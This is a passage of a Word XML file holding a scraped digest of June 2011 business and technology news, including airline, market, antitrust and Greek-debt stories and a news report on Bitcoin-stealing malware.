          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/tepco-halts-water-decontamination-as-cesium-absorption-limited.html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United Airlines Resumes Flights Today After Computer Outage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11:09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UPS Says U.K. Bars Cargo Screening at Some Sites on Security BransonБ─(tm)s Stiletto Gifts Make Virgin Investor Search Tough MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Toyota Expects Return to Full North America Output in September Republic Pins Frontier AirlinesБ─(tm) Fate to Pilot Vote on Savings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Hart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details from statement beginning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United Airlines resumed flights today after a five- hour computer outage late yesterday stranded passengers in U.S. cities, including Chicago, Denver and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airline experienced a network connectivity issue at about 7:15 p.m. local time, which was resolved through troubleshooting procedures and restored at midnight," the airline said in a statement on its website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carrier waived change fees for customers on flights yesterday and today to and from airports in Chicago, Cleveland, Denver, Houston, Los Angeles, San Francisco, Washington, and Newark, New Jersey, as well as Guam and Tokyo, the airline said in a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will be residual delays today and tomorrow, said Alexandria Marren, senior vice president of system operations control, in the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disruption affected United's flight departures, airport processing and reservations systems, including access to its website, the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didn't immediately respond to a voicemail and e-mail from Bloomberg News seeking comment on what caused yesterday's computer disruption.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UAL Corp. merged with Continental Airlines Inc. in October, surpassing Delta Airlines Inc. as the world's biggest carrier and becoming United Continental Holdings Inc.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Mike Harrison in London. Editors: Theo Mullen, Christian Thompson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Dan Hart in Washington at dahart@bloomberg.net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Sylvia Wier at swier@bloomberg.net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From Startup Dreams to a Cubicle Life Bitcoins: Currency of the Geeks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How Talbots GrewБ─"and LostБ─"Its Customers The Big Business of Synthetic Highs Yelp's Online Reviewing Mafia Immigrants Are More Likely to Be Entrepreneurs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Airline Bankruptcy Airline industry Southwest Airlines Green Computing IT Tools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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/united-airlines-resumes-flights-today-after-computer-outage.html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Saudi Shares Sink to Three-Month Low on U.S. Growth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10:38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Emerging Stocks Fall to 3-Month Low on Greece, Technology Tumble MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Abu Dhabi Stocks Rise to Five-Month High on ADCB, Oil Prices HSBC, Rasmala Units Among 90% of U.A.E. Brokers Posting Losses Saudi Arabia Said to Keep Lid on Prices for Chemical Makers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Mourad Haroutunian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Saudi Arabian shares fell to a three-month low, led by banks and petrochemical companies, after the International Monetary Fund cut its U.S. growth forecast for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 Rajhi Bank, the kingdom's largest publicly traded lender by market value, and Saudi Basic Industries Corp., the world's biggest petrochemicals maker, paced the losses. Banque Saudi Fransi fell for a fourth straight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146-company Tadawul All Share Index dropped 0.7 percent to 6,501.25, the lowest level since March 23, at the 3:30 p.m. close in Riyadh, extending its monthly loss to 3.5 percent. Three shares dropped for every stock that rose.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are concerned that demand for petrochemicals will drop after the IMF cut its projection for U.S. growth," Turki Fadaak, an analyst with AlBilad Investment Co., said in Riyadh.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 will grow 2.5 percent this year and 2.7 percent in 2012, down from the 2.8 percent and 2.9 percent projected in April, the IMF said yesterday. The Washington-based fund sees the world economy expanding 4.3 percent this year, down from 4.4 percent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Arabia's petrochemical exports in April made up 31 percent of the kingdom's overall non-oil exports valued at 12.3 billion riyals ($3.3 billion), according to data published on the Department of Statistics and Information's website. Saudi Arabia holds one-fifth of the world's proven oil reserves.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 Rajhi fell 1 percent, the largest loss in a week, to 72.75 riyals. Petrochemicals maker Sabic dropped 0.7 percent to 102 riyals. Banque Saudi tumbled 1.8 percent to 43.10 riyals, the lowest price since March 6, extending its four-day loss to 4.2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Samba Financial Group, Saudi Arabia's second-largest lender by market value, weakened 1.5 percent, the biggest drop in a week, to 50 riyals. The stock has lost 11.9 percent this quarter.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Arabia's stock exchange is the only Gulf Arab bourse open on Saturdays.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Phil Serafino, Digby Lidstone, Kim McLaughlin.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Mourad Haroutunian in Riyadh at mharoutunian@bloomberg.net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Shaji Mathew at shajimathew@bloomberg.net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From Startup Dreams to a Cubicle Life Bitcoins: Currency of the Geeks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Immigrants Are More Likely to Be Entrepreneurs The Big Business of Synthetic Highs Yelp's Online Reviewing Mafia Why Apple Isn't in the Dow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Competitiveness U.S. Retail Sales U. S. Broadband Policy U.S. Healthcare System U.S. Manufacturing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18:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/saudi-shares-sink-to-three-month-low-on-u-s-growth-concern.html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Google's Admeld Purchase Slated for Justice Department Review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9:19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Oracle Seeks Б─≤BillionsБ─(tm) From Google in Java Patent Lawsuit MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO Pandora Falls Below IPO Price, Reversing YesterdayБ─(tm)s Gain Pandora Rises in Biggest Internet IPO Boom Year Since 2000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Sara Forden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Google Inc.'s planned purchase of Admeld Inc., an Internet advertising company, will be subject to a probe by the U.S. Justice Department for its potential to hurt competition, two people familiar with the situation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review of the deal by the Justice Department comes at the same time the Federal Trade Commission is preparing a separate investigation of Mountain View, California-based Google's dominance of the Internet search industry, three people familiar with the matter said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Simultaneous antitrust investigations of one company by the two agencies is "unusual," said Rebecca Arbogast, a Washington-based analyst with Stifel Nicolaus &amp; Co., adding that probes by regulators are fast becoming the "new normal" for Google.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isn't going to get away from this kind of scrutiny until a competitor comes along and unseats them," Arbogast said. "It's a weight tied to their ankle they are carrying around all the time."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Admeld offers technology services to Internet publishers that help them boost revenue by managing display ads from hundreds of sources, including ad networks. Customers of the New York-based company, founded in 2007, include News Corp.'s Fox News and the Weather Channel.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Advertising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advertising - the ads that appear along the tops and sides of Internet publishers' websites - is the fastest- growing segment of the online ad market, according to market research firm IDC.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stepping up investment in display advertising as growth slows in search-based ads, had 14.7 percent of the U.S. display advertising market in the first quarter, according to IDC. Yahoo! Inc. had 12.3 percent, Microsoft Corp. had 6.5 percent and Facebook Inc. had an 8.8 percent share, IDC said in a report published May 26.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Admeld acquisition may help Google boost its growth in the online display advertising segment, said Benjamin Edelman, assistant professor of business administration at the Harvard Business School. Google became a central player in that market through its $3.2 billion acquisition of DoubleClick Inc. three years ago. That deal was approved by the FTC.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U.S. antitrust law, all transactions over $63 million must be reported for review by authorities.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Harm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Admeld isn't going to hurt competition in display advertising, Rob Shilkin, a Google spokesman, said in an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acquisition is designed to help publishers get the most from the rapidly growing display advertising industry, which is both complicated and incredibly competitive - the emergence in recent years of a huge variety of technologies for publishers, like Admeld's, is great evidence of that," Shilkin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Justice Department review will consider whether Google's dominant position in search advertising could render the Admeld transaction anticompetitive, what Google's expansion strategies are for Admeld and whether those plans would shut out competition, the people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Justice Department spokeswoman Alisa Finelli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advertising is one of the few areas of online advertising where Google isn't dominant," said Harvard's Edelman, who according to his website also consults for Microsoft Corp., a Google competitor, as well as media clients including the New York Times, and Universal Music Corp. "That's rapidly changing, and the Admeld deal would accelerate Google's growth that much faster," Edelman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Shared Authority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Justice Department and the FTC share authority to decide if mergers are anticompetitive and to review whether dominant companies are abusing their market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negotiate which will handle major antitrust investigations, with the decision often turning on their respective expertise in an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agencies may want to probe deals of companies with "innovative business practices because it allows them to weigh in on matters that involve cutting-edge technologies or practices, and enables them to set policies," said Alicia Batts, an antitrust lawyer with Proskauer Rose LLP in Washington.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Admeld review means the Justice Department's antitrust division will once again be scrutinizing Google after approving, with conditions, the company's $700 million acquisition of internet travel information company ITA Software Inc.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Travel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seeking to bolster its competitive strength in the ad market against rivals such as Facebook and Apple Inc., followed its purchase of DoubleClick with the acquisition of AdMob Inc. last year for about $700 million. The AdMob transaction was cleared by the FTC, which also reached a settlement with Google in March over privacy violations arising from its Buzz social networking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Approval of Admeld may hinge on how the Justice Department defines the internet advertising market, Proskauer's Batts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is the market leader for search advertising, which is the placement of advertisements alongside search engine query results. Google dominated this market in the U.S. in the first quarter with 59.6 percent compared with Microsoft's 7.9 percent and Yahoo!'s 7 percent, according to the IDC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Stifel's Arbogast said she expects the Admeld deal to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Admeld transaction seems to allow them to do what they do already better,"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Jeff Bliss in Washington and Brian Womack in San Francisco. Editors: Fred Strasser, Mary Romano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Sara Forden in Washington at sforden@bloomberg.net.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Bitcoins: Currency of the Geeks When Two Cancer Drugs Are Better Than One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Immigrants Are More Likely to Be Entrepreneurs The Big Business of Synthetic Highs Yelp's Online Reviewing Mafia Why Apple Isn't in the Dow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Corporate Legal Departments Business and the Supreme Court Retail Traveling for Business Skype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17:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/google-s-admeld-purchase-slated-for-justice-department-review.html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Cable Operators Fight Online Competition by Mimicking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9:17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FalconeБ─(tm)s LightSquared, Sprint Agree to 15-Year Network Accord AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO Pandora Falls Below IPO Price, Reversing YesterdayБ─(tm)s Gain Pandora Rises in Biggest Internet IPO Boom Year Since 2000 Providence Equity Is Said to Be in Lead to Buy Blackboard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 Sherman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U.S. cable companies are trying to stem video customer losses by embracing one of the things that's pulling them away: the Internet.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Cable &amp; Telecommunications Association's annual show, which wrapped up Thursday in Chicago, showcased services including Internet- connected set-top boxes and personalized viewing guides. Comcast Corp., the largest cable operator, capped the conference with a demonstration of its Xcalibur guide that integrates social media into the TV.</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Comcast's lead, companies including Time Warner Cable Inc. and Cox Communications Inc. plan to tweak interfaces and offer interactive services to retain subscribers who spend more time using smartphones and Internet-connected devices. The industry lost about 2 million basic video subscribers last year and continued shedding customers in the first quarter, as it faces competition from online alternatives like Netflix Inc. and Hulu LLC.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know we need to get better, and we're working on it," Pat Esser, president of Atlanta-based Cox, said in an interview. "Our video interface does not meet the needs of our customers."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Personalizing the viewing guide is a boon for advertisers, who can eventually utilize Internet provider data to offer tailored commercials to cable customers, according to Thomas Eagan, an analyst at Collins Stewart LLC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Comcast Chief Executive Officer Brian Roberts stressed the need for personalization on a TV interface. The company's Xcalibur service allows customers to "like" shows through Facebook and offer suggestions based on their friends' recommendations. Users can also watch TV in a way that closely resembles how they watch video on a smartphone or tablet computer.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Philadelphia-based Comcast has begun testing the service in Augusta, Georgia, and plans to introduce it in all of its markets next year, according to Jennifer Khoury, a spokeswoman.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Set-top boxes with Internet connectivity will potentially allow cable operators to deliver streamed video, from companies such as Netflix and Hulu, to subscribers. Consumers may not be able to experience the full Internet on their TVs before content providers and cable operators reach agreements over rights, according to Paul Sweeney, an analyst at Bloomberg Industries.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Studios and networks may want more money from distributors showing their Internet content on a TV screen, and providers may ask for a larger slice of the rights to pay for the extra bandwidth it takes to deliver HD content.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Infrastructure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expect to see cable operators giving customers full access to Hulu," said James Ratcliffe, an analyst at Barclays Capital Inc., referring to the online streaming service controlled by three of the biggest U.S. broadcasters. "There's an existing video infrastructure for the cable operators that works well. You wouldn't build that from scratch if you were starting over again, but given it's in place, replacing it with an all-IP based delivery to the set-top box doesn't make a lot of sense until you need to do so."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James Callan, Peter Elstrom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Alex Sherman in New York at asherman6@bloomberg.net.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Bitcoins: Currency of the Geeks When Two Cancer Drugs Are Better Than One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Immigrants Are More Likely to Be Entrepreneurs The Big Business of Synthetic Highs Yelp's Online Reviewing Mafia Why Apple Isn't in the Dow Kindergarten at 20,000 Feet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Cable Operators Online Banking Online Video Online Retail Online Project Collaboration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17:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/cable-operators-fight-online-competition-by-mimicking-the-web.html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 Officials Set to Discuss Greek Plan That Skirts Default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8:02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 Prepares New Greek Aid Deal as Merkel Backs ECB Approach Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary EU Ministers Set to Clear Way for Greek Payment, Germany Says MerkelБ─(tm)s Greek Bondholder Gambit Tested as Sarkozy Visits Greece Aid Talks Deadlock as Pressure on Papandreou Builds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Tony Czuczka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European finance ministers meet tomorrow to hammer out a new Greek bailout package watertight enough to avoid triggering a default that German Chancellor Angela Merkel said would be uncontrollable.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must figure out how to design a package that will encourage investors to roll over expiring Greek debt after Merkel yesterday ended a standoff with the European Central Bank over restructuring the country's debt load. Talks will start at 6 p.m. in Luxembourg and continue the next day. EU leaders meet on June 23-24.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comes the tricky part," said Tullia Bucco, an economist at Unicredit Global Research in Milan. "This proposal is fraught with difficulties in identifying ways to provide banks with incentives to rollover their bonds. Any deterioration in bond conditions via new coupons below market rates would be seen by rating agencies as the trigger of a credit event."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 bonds and the euro jumped yesterday after Merkel ended a feud with the ECB that roiled markets. Highlighting the risks still facing the euro region, Greek Prime Minister George Papandreou must win a parliamentary confidence vote next week that could delay Greece's next round of austerity and Moody's Investors Service said late yesterday it may cut its Aa2 rating on Italy's sovereign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Lehman Experience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today in Berlin that policy makers must make sure the Greek crisis doesn't infect the rest of the euro region and spark a new global financial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lived through Lehman Brothers," she told a meeting of activists from her ruling Christian Democrat party. "I don't want another such threat to emanate from Europe. We wouldn't be able to control an insolvency."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Luxembourg Prime Minister Jean-Claude Juncker, who chairs tomorrow's talks, says a new Greek plan will have to be rubberstamped by the ECB.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made a move that would be rejected by the ECB, by the rating agencies and therefore the financial markets, we risk setting the euro area aflame," La Libre Belgique quoted Juncker as saying in an interview published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is that any pact will still be classified as a form of default by rating companies, effectively cutting Greek banks off from emergency ECB funding. Fitch Ratings said June 15 that a rollover would prompt it to cut Greece's sovereign rating to "restricted default." The bonds themselves would still avoid default and be left at "a low non-investment grade probably in the region of CCC," it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Collateral Incentive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debt is currently graded B+ at Fitch. Standard &amp; Poor's on June 13 cut its rating on Greece by three levels to CCC, branding it with the world's lowest debt grade.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officials have discussed incentives for investors to reinvest the proceeds of their maturing bonds into new debt, according to people familiar with the situation. They include giving investors preferred status, higher coupon payments or collateral as inducements to buy bonds replacing Greek debt maturing between 2012 and 2014,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yield on Greece's two-year bond, which topped 30 percent for the first time on June 16, fell 90 basis points to 28.79 percent yesterday. The signs of flexibility from Germany sent the euro up as much as 1 percent to $1.4339.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Spanish Prime Minister Jose Luis Rodriguez Zapatero said in St. Petersburg today that he expects EU leaders to make a "political commitment" to Greece next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yesterday she was now willing to accept that the so-called Vienna initiative of 2009, which encouraged creditors to roll over expiring bonds, could be a model for private-investor participation in the new aid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Reshuffle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marked a reversal from the position set out by her finance minister, Wolfgang Schaeuble, who had insisted that Greek bond maturities be extended by seven years. The approach met ECB resistance and led to credit-rating company warnings that the move was tantamount to default, stalling efforts to craft an aid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will meet two days after Papandreou announced a Cabinet reshuffle that included replacing Finance Minister George Papaconstantinou in a bid to get rebelling allies to back the 78 billion-euro ($112 billion) austerity plan that the EU and IMF have made a condition for new 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named Evangelos Venizelos, his defense minister and a former rival for leadership of the ruling Socialist party, to replace Papaconstantinou.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then called for a vote of confidence in his new government, which will probably be held the evening of June 21 after three days of debate.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Push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is nevertheless still pushing for private investors to play a "substantial" role in any new package, without specifying what that would look like.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 us try to get together a substantial contribution in this participation of private creditors," she said today. "But we don't do this on the street, we don't do this in press conferences, we do this in serious talks with those making the contribution."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estimates put Greece's 2012-14 financing gap at as much as 170 billion euros. It would be filled by about 45 billion euros of loans, plus 57 billion euros in unspent aid from the 2010 bailout, roughly 30 billion euros in asset- sale proceeds and about 30 billion euros from creditors.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John Fraher, Randall Hackley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Tony Czuczka in Berlin at aczuczka@bloomberg.net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Water Is the New Texas Liquid Gold Bitcoins: Currency of the Geeks From Startup Dreams to a Cubicle Life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Immigrants Are More Likely to Be Entrepreneurs The Big Business of Synthetic Highs Bitcoins: Currency of the Geeks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Risk Management Bailout Human Capital Network Neutrality Sales Performance Management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15:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/eu-officials-set-to-discuss-greek-plan-that-skirts-default-risk.html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Saudi Shares Fall Most in a Week on U.S. Economic Growth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8:05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Emerging Stocks Fall to 3-Month Low on Greece, Technology Tumble MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Abu Dhabi Stocks Rise to Five-Month High on ADCB, Oil Prices HSBC, Rasmala Units Among 90% of U.A.E. Brokers Posting Losses Saudi Arabia Said to Keep Lid on Prices for Chemical Makers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Mourad Haroutunian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Saudi Arabian shares dropped the most in a week, led by petrochemical companies and banks, after the International Monetary Fund cut its U.S. growth forecast for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Basic Industries Corp., the world's biggest petrochemicals maker, and Al Rajhi Bank, the kingdom's largest publicly traded lender by market value, led the losses. Banque Saudi Fransi fell for a fourth straight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146-company Tadawul All Share Index dropped 0.8 percent, the biggest intraday loss since June 11, to 6,499.27 at 2:15 p.m. in Riyadh, extending its monthly loss to 3.5 percent. Four shares dropped for every stock that rose.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are concerned that demand for petrochemicals will drop after the IMF cut its projection for U.S. growth," Turki Fadaak, an analyst with AlBilad Investment Co., said in Riyadh.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 will grow 2.5 percent this year and 2.7 percent in 2012, down from the 2.8 percent and 2.9 percent projected in April, the IMF said yesterday. The Washington-based fund sees the world economy expanding 4.3 percent this year, down from 4.4 percent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Arabia's petrochemical exports in April made up 31 percent of the kingdom's overall non-oil exports valued at 12.3 billion riyals, according to data published on the Department of Statistics and Information's website. Saudi Arabia holds one- fifth of the world's proven oil reserves.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Banque Saudi tumbled 1.6 percent to 43.20 riyals, the lowest price since March 15, extending its four-day loss to 4 percent. Petrochemicals maker Sabic dropped 1 percent, the largest intraday loss in a week, to 101.75 riyals. Al Rajhi weakened 0.7 percent to 73 riyals.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Arabia's stock exchange is the only Gulf Arab bourse open on Saturdays.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Phil Serafino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Mourad Haroutunian in Riyadh at mharoutunian@bloomberg.net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Shaji Mathew at shajimathew@bloomberg.net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Water Is the New Texas Liquid Gold Bitcoins: Currency of the Geeks From Startup Dreams to a Cubicle Life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Immigrants Are More Likely to Be Entrepreneurs The Big Business of Synthetic Highs Bitcoins: Currency of the Geeks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Economic History U.S. Auto Sales U.S.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Competitiveness U.S. Retail Sales U.S. Healthcare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15:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/saudi-shares-fall-most-in-a-week-on-u-s-economic-growth-concern.html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May New-Home Prices Rise as Developers Hold Off Cuts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2:33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New Home Prices Gain in 67 Out of 70 Cities on Year Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) Starwood Expects China to Be Largest Growth Market in 3 Years China Property DevelopersБ─(tm) Outlook Cut to Б─≤NegativeБ─(tm) by S&amp;P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economist's quote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The price of new homes in China rose last month in 67 of the 70 cities monitored as developers held off on reducing how much they charged while studying the effects of policies aimed at controlling the property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new-home prices increased by more than 6 percent from a year earlier in 19 cities, compared with 21 cities in April, according to data the National Bureau of Statistics posted to its website today. Prices in northeastern China's Dandong rose 9.7 percent in May, the most among the 70 cities monitored.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on June 14 ordered banks to hold more money as reserves for the sixth time in 2011 as it fights to contain inflation and curb home prices. Authorities said last month they will maintain curbs after intensifying measures this year with higher minimum down payments for second-homes and residential property taxes in Shanghai and Chongqing. Prices for existing homes fell in May from April in 23 cities, today's data showed.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"Developers are still watching to see how strict the government's property measures will be before cutting prices," said Shen Jian-guang, a Hong Kong- based economist at Mizuho Securities Asia Ltd., in a phone interview. "The slowdown of existing home prices is showing the government's home purchase restrictions are having some effect."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 increases for new homes slowed last month in big cities such as the capital of Beijing, the statistics bureau said. Efforts to rein in property prices have been focused on the nation's largest urban areas. A total of 29 cities posted increases exceeding 5 percent, down from 33 cities in April, according to the bureau's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Biggest Gains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New-home prices in the capital of Beijing rose 2.1 percent in May from a year earlier, while those in Shanghai climbed 1.4 percent, the statistics bureau said. The biggest gains last month were in smaller cities including Urumqi, Mudanjiang, Lanzhou and Qinhuangdao, which all posted increases of at least 7.7 percent, according to the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with the previous month, new home prices fell in nine cities in May, the same number as in April.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cities posted falling prices for existing homes. In May, prices for existing homes fell from the previous month in 23 cities, compared with 16 in April, the bureau said. Existing home prices in Beijing fell 0.2 percent from April while those in Shanghai increased 0.2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dynamics of prices this year will be much less aggressive than in the past," said Luca Silipo, chief Asia- Pacific economist at Natixis before today's release. "If you look at the transaction volumes, the policies are working."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 Cuts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developers such as China Vanke Co. and China Overseas Land &amp; Investment Ltd. started to cut prices in some Chinese cities, and more may follow suit in the second half of this year, according to Credit Suisse Group AG.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developers' outlook was cut to "negative" from "stable" by Standard &amp; Poor's on June 15 on concern tighter credit and further government curbs may lead to rating downgrades in the next year. Property sales may start to slow as the government's policy "starts to bite," leading to price cuts that may drive home prices 10 percent lower in the next 12 months, the credit rating company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government's tightening property and monetary policy remain in place, the turning point of home prices may appear in the third quarter of this year," Mizuho's Shen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May home sales transaction value rose 17 percent from April as developers marketed more residential projects during the Labor Day long weekend even as the government maintained its housing curbs. The value of homes sold increased to 380.9 billion yuan from 324.9 billion yuan in April, based on the difference between the statistics bureau's data for the first five months released on June 14 and the first four posted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gauge tracking property shares in Shanghai rose 1.2 percent yesterday, the best performing group among the five in the Shanghai Composite benchmark.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--Bonnie Cao. Editors: Malcolm Scott, John Liu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Bonnie Cao in Shanghai at bcao4@bloomberg.net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MBA Pay: The $3.6 Million Degree Why Apple Isn't in the Dow The Big Business of Synthetic Highs Bitcoins: Currency of the Geeks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MBA Pay: The $3.6 Million Degree God's MBAs: Why Mormon Missions Produce Leaders The Big Business of Synthetic Highs Bitcoins: Currency of the Geeks Keenwash: A Waterless Car Wash from the Middle East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MBA Jobs: Post-Crisis, a Brave New World Water Is the New Texas Liquid Gold Stocks: Industries to Watch in 2010 Chewing Over Herman Cain's Pizza Past Yelp's Online Reviewing Mafia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China Business China's Media China Real Estate China's Economy Oil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10:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-18/china-may-new-home-prices-rise-as-developers-hold-off-cuts.html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New malware ferrets out and steals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Hopelessly devoted to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Goodin in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know your virtual currency has hit the big leagues when criminals develop trojans that infect computers for the sole purpose of stealing it. Bitcoin, the open-source project launched two years ago, reached that turning point Thursday.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when researchers from Symantec discovered Infostealer.Coinbit, a piece of Windows malware that ferrets out the digital wallet stashed on Bitcoin users' hard drives and uploads it to an SMTP server that's probably located in Poland. It's the first report of a trojan in the wild that targets the digital cash, but Symantec researchers said its only a matter of time until the feature is found in other pieces of malware.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Б─°If you use Bitcoins, you have the option to encrypt your wallet and we recommend that you choose a strong password for this in the event that an attacker is attempting to brute-force your wallet open,Б─² Symantec's Stephen Doherty wrote in a blog post.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advice makes sense, since Bitcoins are just like cash in the sense that they lack any sort of intrinsic method of tracking the thief. The digital currency's peer-to-peer architecture was designed from the ground up to foster transactions that can't be reversed and to allow users to remain anonymous. A Bitcoin user calling himself Allinvain claims to have learned that lesson the hard way when, he said, someone stole coins theoretically valued at $500,000.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this irreversibility points to a potential risk of following Symantec's advice to encrypt the wallet: Lose the key and your coins will be lost forever.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separate Symantec researcher, Peter Coogan, has theorized a separate way online crooks could profit handsomely from a Bitcoin feature that allows users to Б─°mineБ─² coins by contributing CPU cycles to solving a cryptographic problem. Criminals wielding a botnet of 100,000 infected machines, for example, could generate $97,000 per month, assuming all nodes worked on the problem continuously.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2011.06.18 08:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/06/18/bitcoin_stealing_malware/</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RIM Investor Jarislowsky Joins Demands for Chairman-CEO Split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Apple Is Said to Bid in Auction for Nortel Networks Patents Oracle Seeks Б─≤BillionsБ─(tm) From Google in Java Patent Lawsuit RIM Drops to Four-Year Low After Forecast Misses Estimates AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO Johnson Exit Leaves Apple Without Retail Head Amid Expansion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Hugo Miller and Jonathan Erlichman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Billionaire Stephen Jarislowsky, one of Research In Motion Ltd.'s largest shareholders, added his name to the call for the BlackBerry smartphone maker to split the roles of chairman and chief executive officer.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should not have these two people at both positions because they have worked together all their lives and they are basically the same person, from point of view of policy," Jarislowsky, chairman of Jarislowsky Fraser Ltd., said yesterday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Montreal-based investment firm - formerly the company's sixth-biggest investor, with 10.2 million shares of RIM at the end of the first quarter - has sold more than half its stake,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 investors are becoming increasingly vocal about their dissatisfaction with co-CEOs Jim Balsillie and Mike Lazaridis, after the company's second- quarter sales and profit forecast missed analysts estimates, hurt by sluggish demand for its aging BlackBerry portfolio. Lazaridis, who invented the BlackBerry to handle mobile e-mail, has shared the role of CEO with Jim Balsillie since 1992. They are also both co-chairmen.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Northwest &amp; Ethical Investments LP has called for RIM to separate the roles of chairman and CEO, and shareholders will vote on that question at the company's shareholder meeting July 12, according to a RIM proxy statement last week. Separating the two posts does put the board in a better position "to ask the CEO the kind of hard questions they have to ask from time to time," Robert Walker, vice president of ethical funds at Northwest &amp; Ethical, said in an interview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Tumble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 based in Waterloo, Ontario, plunged $7.58, or 21 percent, to $27.75 yesterday in Nasdaq Stock Market trading, dropping to its lowest level since 2006. The stock has fallen 52 percent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analysts have criticized the co-CEO structure. Northern Securities Inc.'s Sameet Kanade suggested in April that the company should put Lazaridis in sole charge.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Jarislowsky is critical of Balsillie, who he says has lost focus.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believe he is taking his eye off the ball," Jarislowsky said. "He's gotten involved in all sorts of things outside the business."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Balsillie has tried unsuccessfully to bring U.S.-based National Hockey League franchises to Canada in recent years. He also is the founder of the Balsillie School of International Affairs and chairman of the Centre for International Governance Innovation, both in Waterloo.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Inefficient Setup?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Balsillie's own suitability for the role, other analysts have criticized what they see as the inefficiency of the co-CEO structure, because it creates an unnecessary duplication of responsibilities that slows product development.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dual CEOs, you have a challenge," said Brian Modoff, an analyst at Deutsche Bank Securities Inc. in San Francisco. "There are teams that are working on certain functions, but only reporting to one or the other CEO."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Lazaridis acknowledged the investor frustration on a conference call with analysts this week, saying he knew the past few months had been "difficult" for shareholders.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 can't promise that there won't be bumps in the road ahead, I can assure you that Jim and I have never been more committed to the business," Lazaridis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men defended the co-CEO structure and gave no indication they plan to abandon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don't think it's the issue," Balsillie told analysts. "I think I have expertise in what I do. I think Mike has distinctive expertise in what he does. I think there's parts that overlap and we highly coordinate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analysts downgraded the company yesterday, including Caris &amp; Co.'s Rob Cihra. RIM has proved "painfully slow" in getting new models including its touch-screen Bold into stores to keep BlackBerry customers from defecting to Apple Inc.'s iPhone or devices that run Google Inc.'s Android software,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RIM has slipped into eroding mismanagement,"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Nick Turner, Lisa Rapaport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Hugo Miller in Toronto at hugomiller@bloomberg.net; Jonathan Erlichman in New York at jerlichman1@bloomberg.net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Investor Relations Active Investors IT for Oil and Gas Bank for International Settlements Investing in Turkey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http://www.businessweek.com/news/2011-06-18/rim-investor-jarislowsky-joins-demands-for-chairman-ceo-split.html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Two-Year Notes Rise for 10th Week, Longest Gain in 25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12:28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U.S. 2-Year Notes Rise a 10th Week as Greece Spurs Refuge Demand Treasuries Gain on Concern Greece Will Struggle to Avoid Default U.S. Economy: Confidence Eroding Among Factories, Consumers Treasuries Rally as European Discord Threatens Greece Rescue Chinese Holdings of Treasuries Rise as Fed Purchases Near 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Susanne Walker and Daniel Kruger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Treasuries advanced, with two-year notes rising for a 10th straight week in their longest rally in a quarter-century, on concern Greece will struggle to avoid the euro area's first sovereign-debt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notes of all maturities touched their 2011 lows this week as Greece's Prime Minister George Papandreou pleaded with his allies in parliament to support his austerity plans. U.S. reports unexpectedly showed manufacturing in the Philadelphia and New York regions contracted before next week's meeting of the Federal Open Market Committee.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 lot of embedded fear in the marketplace," said William Larkin, a fixed-income money manager in Salem, Massachusetts, at Cabot Money Management, which oversees $500 million. "People think the solution for Greece is going to be in years, if not decades."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two-year notes decreased two basis points, or 0.02 percentage point, to 0.38 percent, according to Bloomberg Bond Trader prices. The 0.5 percent security due in May 2013 advanced 1/32, or 31 cents per $1,000 face amount, to 100 1/4.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two-year note yields fell on June 16 to 0.33 percent, the lowest level since Nov. 5. The record low of 0.3118 percent was set the day before that. The last time two-year note yields dropped for 